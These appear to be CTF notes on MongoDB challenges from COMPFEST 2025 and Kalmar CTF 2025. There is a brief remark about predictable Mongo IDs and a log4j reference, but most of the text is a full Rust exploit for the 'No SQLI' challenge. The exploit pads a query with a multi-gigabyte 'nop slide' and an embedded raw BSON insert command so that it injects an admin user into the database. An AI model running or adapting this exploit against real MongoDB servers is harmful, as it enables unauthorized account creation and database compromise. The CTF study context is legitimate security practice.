Mongo ID can be predicted
| Event Name | COMPFEST 2025 |
| GitHub URL | - |
| Challenge Name | Gift for the Tifosi |
Attachments
References
this mongo db version is vulnerable to log4j
https://community.progress.com/s/article/blackduck-identified-vulnerability-with-mongodb#:~:text=BlackDuck%20identified%20vulnerability%20log4j%201.2.25%20in%20Progress%20DataDirect,log4j%20can%20lead%20to%20remote%20arbitrary%20code%20execution.
Mongo
| Event Name | Kalmar CTF 2025 |
| GitHub URL | https://github.com/kalmarunionenctf/kalmarctf/tree/main/2025 |
| Challenge Name | No SQLI |
Attachments
minus require 4gb payload to send
use mongodb::{bson::doc, Client, options::ClientOptions, Collection};
use mongodb::error::Result;
use mongodb::bson::Document;
#[tokio::main]
async fn main() -> Result<()> {
let client_uri = "mongodb://localhost:27017";
let client_options = ClientOptions::parse(client_uri).await?;
let client = Client::with_options(client_options)?;
let collection: Collection<Document> = client.database("mydb").collection("users");
let mut username_padding: String = "aaaaaaaaa".to_string();
let real_nop_slide = "\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".repeat(27962023);
let last_nop_slide = format!("{}{}", "\x21", "\x00".repeat(0x20));
let mut custom_char: String = "\x07".to_owned();
let username = "l\x00\x00\x00\x00";
username_padding.push_str(&real_nop_slide);
username_padding.push_str(&last_nop_slide);
username_padding.push_str(&username);
//minus 2 for the padding and minus 94 for the raw message size
let payload: String = "a".repeat(0xdd000000-2-94);
let mut message: String = "\x00\x00\x00\x00\x00\x00\x00W\x00\x00\x00\x02insert\x00\x06\x00\x00\x00users\x00\x04documents\x00'\x00\x00\x00\x030\x00\x1f\x00\x00\x00\x02u\x00\x06\x00\x00\x00admin\x00\x02p\x00\x06\x00\x00\x00admin\x00\x00\x00\x02$db\x00\x05\x00\x00\x00mydb\x00\x00".to_string();
message.push_str(&payload);
custom_char.push_str(&message);
match collection.find_one(doc! { "u": &username_padding, "p": &custom_char }, None).await {
Ok(Some(_user)) => {
println!("OK: Authentification réussie pour l'utilisateur '{}'", username);
},
Ok(None) => {
println!("NOK: Identifiants invalides pour l'utilisateur '{}'", username);
},
Err(err) => {
println!("Erreur MongoDB: {}", err);
}
}
Ok(())
}